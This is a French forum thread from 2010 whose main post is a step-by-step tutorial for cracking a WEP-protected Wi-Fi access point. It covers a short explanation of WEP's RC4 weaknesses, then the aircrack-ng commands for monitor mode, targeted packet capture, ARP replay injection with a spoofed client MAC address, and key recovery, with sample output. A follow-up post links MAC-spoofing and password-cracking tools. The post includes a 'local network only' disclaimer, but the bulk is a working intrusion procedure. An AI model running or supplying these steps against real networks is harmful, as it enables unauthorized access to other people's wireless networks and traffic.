unkn0wn Posté(e) le 27 août 2010 Share Posté(e) le 27 août 2010 (modifié) avant tous j’espère que cette fois mon sujet ne disparaîtra pas pour je ne sais quelle raison. et si il est supprimé sous prétexte que c'est pas légale de parlé de sa ou bien qu'il faut pas divulgué ce genre d'informations je vous pris de supprimé le forum sécurité informatique c'est mieux vous y gagnerais en espace et en temps A tester seulement dans votre réseau local - Scénario: -Point d'accès wi-fi (AP) protégé par une clé WEP avec un ou plusieurs clients connecté logiciels requis: 1- Un sniffer pour pouvoir exploré le réseau et détecté les points d'accès (AP) et les clients connecté 2-Un injecteur de pâques pour stimulé le réseau afin de récupéré un max de DATA 3-un *****er pour pouvoir déchiffré la clé wep je vous conseille la suite Aire.*****-ng qui contient tous les outilles nécessaire [airodump-ng, aireplay-ng, air*****-ng, airmon-ng] ou bien vous pouvez Utilisé la distribution BackTrack,(en live cd ou avec une clé usb) Backtrack contient tous ce qu'il faut pour ce tutoriel NB: je précise que j'utilise un système d'exploitation "Linux" Notation: MAC: adresse mac de ma carte wi-fi BSSID : adresse MAC du point d'accée ESSID: nom du point d'accès Channel: le canal du point d'accès ( de 1 jusqu'à 12) Un peut de théorie: le WEP est un mécanisme simple de chiffrement de données, ce cryptage travaille avec l’algorithme RC4 pour chiffrer les données et utilise des clés statiques de 64 ou 128 bits Le principe du WEP consiste à définir une clé sécrète qui doit être déclarée au niveau de chaque adaptateur sans fil du réseau (Clients) ainsi que sur le point d’accès (AP). La clé sert à créer un nombre pseudo-aléatoire d’une longueur égale à la longueur de la trame. Chaque élément du réseau voulant communiquer entre eux doit connaître la clé secrète qui va servir au cryptage WEP. Une fois mis en place, toutes les données transmises sont obligatoirement cryptées. Il assure ainsi l’encryptage des données durant leur transfert ainsi que leurs intégrités. pour les failles on peut cité: - le cryptage RC4 présente des faiblesses. - La clé de session partagée par toutes les stations est statique. Cela signifie que pour déployer un grand nombre de stations WiFi, il est nécessaire de les configurer en utilisant la même clé de session – ceci ayant pour conséquence que la connaissance de la clé est suffisante pour déchiffrer les communications. - De plus, 24 bits de la clé servent uniquement pour l’initialisation, ce qui signifie que seuls 40 bits de la clé de 64 bits servent réellement à chiffrer et 104 bits pour la clé de 128 bits. Pour pouvoir cr@cké cette clé WEP on vas: 1-sniffer le réseau pour voir les points d'acceé 2-stimulé le trafique en injectant des paquets pour récupéré le max de clé de session 3-kr@cké les clé de session pour avoir la clé Pratique: 1- mètre la carte Wi-Fi en mode moniteur avec "airmon-ng": [le mode moniteur veut dire que notre carte wi-fi vas écouté sur le réseau et récupéré les Pâques même si ils ne sont pas destiné a nous] [root@darkstar ]# iwconfig lo no wireless extensions. eth0 no wireless extensions. wmaster0 no wireless extensions. wlan0 IEEE 802.11bg Mode:Managed Frequency:2.462 Retry min limit:7 RTS thr:of Fragment thr=2352 Dans ce cas ma carte wi-fi est wlan0 et elle est en mode Managed [root@darkstar# airmon-ng start wlan0 Interface Chipset Driver wlan0 Atheros ath5k - [phy0] (monitor mode enabled on mon0) notez que le mode moniteur est activé sur mon0, c'est parce que ma carte est une Atheros elle peut crée des carte virtuelle on peut vérifier avec iwconfig [root@darkstar dragoun]# iwconfig lo no wireless extensions. eth0 no wireless extensions. wlan0 IEEE 802.11bg ESSID:"" Mode:Managed Frequency:2.412 GHz mon0 IEEE 802.11bg Mode:Monitor Frequency:2.412 GHz RTS thr:off Power Management:ofLink Quality:0 Signal level:0 Noise level:0 2-Sniffer le réseau et détecté les points d'accès et les clients: [root@darkstar dragoun]# airodump-ng mon0 qui me renvoi ce résultat 1: BSSID => adresse MAC du point d'accée 2: #DATA =>les pâques récupéré,qui vont servir a avoir la clé WEP 3: ENC => type de cryptage [ dans ce cas WEP] 4: ESSID => Nom du point d'accé 5: STATION => L'adresse MAC d'un client qui est connecté sur le point d'accès -j'ai oublier d'encadré: CH (entre #DATA et ENC) => canal du point d'accès maintenant qu'on a l'adresse MAC de (AP) et le canal on vas commencé a sniffé sur ce canal avec la commande suivante : [root@darkstar ]# airodump-ng -w /home/*****/*****-wep -c 1 -b 00:90:D0:DC:B1:E2 mon0 -w: le fichier ou on vas sauvegardé les pâques capturé (qui sera utilisé par air*****-ng âpre) -c 1 : sniffé sur le canal 1 -b: sniffer seulement les pâques émis par cette adresse MAC 00:90:D0:DC:B1:E2 (AP) mon0: interface a utilisé ce qui renvoi le résultat suivant on remarque qu'on 1e minute on a récupéré 2077 #DATA pour cr@cké une clé de 64 bits il nous faut minimum 10.000 data et pour une 128 bits il faut 50.000 data, ou plus dans ce cas on ne connais pas le type de la clé, supposant qu'elle soit une 128 bits 3- Injecter des paquet: afin d'avoir nos 50.000 DATA rapidement on vas encore stimulé le réseau en envoyant des pâques ARP a l'AP en utilisant l'adresse MAC du client connecté comme adresse source (spoofé l'adresse MAC du client) [root@darkstar ]# aireplay-ng -3 -e SpeedTouch345B2D -a 00:90:D0:DC:B1:E2 -h 00:19:7E:01:A3:70 mon0 - 3: pour dire qu'il faut injecter des pâques ARP - e : nom du point d'accés - a : adresse MAC du point d'accès - h: adresse MAC du client (pour faire croire que les pâques viennent de lui) mon0: interface wi-fi - Apré 15 minutes on remarque qu'on a récupéré 56.689 DATA ce qui suffit même pour une clé 128 bits 4- cr@cké les paquets: on récupéré le fichier enregistré avec airodump-ng et on en le ***** avec air*****-ng [root@darkstar ]# air*****-ng /home/*****/*****-wep-01.cap -b 00:90:D0:DC:B1:E2 *****-wep-01.cap: fichier sur le quelle on a sauvegardé lespâques avec airodump-ng -b: adresse de AP KEY FOUND!===> en ASCII sa donne :"aabbccddeeff1" +EDIT CONTENU HORS CHARTE [/color] Modifié le 28 août 2010 par ReDhAx 1 Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
unkn0wn Posté(e) le 27 août 2010 Auteur Share Posté(e) le 27 août 2010 pour ceux qui disent que la protection par filtrage d'adresse MAC est suffisante => http://www.alobbs.com/macchanger/ pour ceux qui croix qu'un bon mots de passe ne peut pas être cr@cké => http://code.google.com/p/pyrit/ pour ceux qui croix qu'on fait tts sa juste pour avoir accée a internet => http://www.torrentreactor.net/torrents/3273984/DEFCON-17 Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Invité gameslover Posté(e) le 27 août 2010 Share Posté(e) le 27 août 2010 Epic Fail ! source ? Citer Lien vers le commentaire Partager sur d’autres sites More sharing options...
Messages recommandés
Rejoindre la conversation
Vous pouvez publier maintenant et vous inscrire plus tard. Si vous avez un compte, connectez-vous maintenant pour publier avec votre compte.